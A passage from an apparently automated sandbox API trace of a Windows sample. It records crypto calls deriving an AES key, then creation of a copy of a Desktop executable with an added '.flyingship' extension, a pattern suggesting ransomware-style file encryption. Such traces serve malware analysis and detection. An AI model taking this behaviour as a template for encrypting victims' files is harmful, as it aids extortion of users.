wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.301] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.301] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.301] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0077.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.302] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696a48) returned 1 [0077.303] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.303] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.303] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.303] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.303] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.303] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.304] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.304] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.304] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.304] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.304] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.304] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.304] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.304] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.304] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.304] CryptCreateHash (in: hProv=0x696a48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0077.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.305] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0077.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.305] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.305] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.323] CryptHashData (hHash=0x6b89f8, pbData=0x6f96a8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0077.323] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.324] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.324] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.324] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.324] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.339] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.339] CryptDeriveKey (in: hProv=0x696a48, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8ab8) returned 1 [0077.339] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.340] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0077.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.340] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0077.340] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.340] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.341] GetLastError () returned 0x2 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.341] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0077.341] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.341] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a38 [0077.342] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8a38 | out: hHeap=0x650000) returned 1 [0077.342] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0077.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0077.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0077.342] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0077.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0077.344] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0077.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0077.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8a38 [0077.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x771fe8 [0077.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0077.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0077.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.flyingship.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.flyingship.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0077.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0077.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0077.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0077.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0077.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.345] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0077.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0077.346] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0077.346] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0077.346] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.347] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0077.347] RtlAllocateHeap 